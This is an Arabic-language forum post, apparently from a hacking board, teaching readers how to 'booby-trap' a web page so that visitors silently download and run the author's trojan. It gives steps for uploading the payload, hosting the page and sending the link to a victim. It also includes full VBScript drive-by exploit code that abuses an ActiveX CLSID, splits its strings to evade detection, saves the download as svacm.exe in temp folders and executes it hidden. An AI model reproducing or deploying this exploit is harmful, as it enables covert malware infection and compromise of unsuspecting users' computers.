كود PHP:
شرح كيفية تلغيم صفحة انترنت بباتش
:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::
صفحة الانترنت الملغمه بباتش ماتشتغل الا على ماسووا تحديثات للنظام
وبعض الثغرات تتخطى التحديثات بس ماتتخطى جميع التحديثات ونادرا تتخطى جميع التحديثات
.................................................. ......................
فكرة الصفحه الملغمه بباتش : عباره عن صفحه مبرمجه بلغة html او php تضع بوسطها رابط باتشك المباشر واذا دخل اي واحد على الصفحه راح ينزل الباتش بجهازه ويشتغل بدون مايحس ..... وبكذا راح تخترقه...
مثل: صفحه ملغمه بباتش وتكون فاضيه بيضا ..
ومثل : صفحه ملغمه بباتش وبوسطها صوره ( اذا فتح الضحيه الصفحه راح تطلع له الصوره ) ..
.................................................. ...................
اول خطوه نرفع الباتش على موقع رفع مثل RipWay.com
ثانيا نفتح الثغره بالمفكره
بعدها نستبدل اللي موضح لنا برابط الباتش المرفوع
واذا كانت فيه صوره نحط رابط اي صوره تعجبك نستبدل هذا الرابط برابط الصوره
ونحفظها بصيغة html
مثلا نكتب الاسم index.html
.................................................. .........................
بعدها نرفع الصفحه الملغمه الى موقعك الخاص ونعطي الرابط الضحيه.....
نجرب الثغره
كود PHP:
<html>
<head>
<title>Exploit-Pro</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = ********.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6
str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="هنا نضع برابط الباتش المرفوع "
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject" ,"")
if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
fname1= F.BuildPath(tmp,"\svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("****l.Application","")
Q.****lExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>
<head>
<img border="0" src=" برابط الصوره هنا نضع"
<hr>
<!-- **********location.href='http://google.com'</script> -->
</body>
</html>
ونحفظها بصيغة html
ونواصل كما في الشرح................................finish.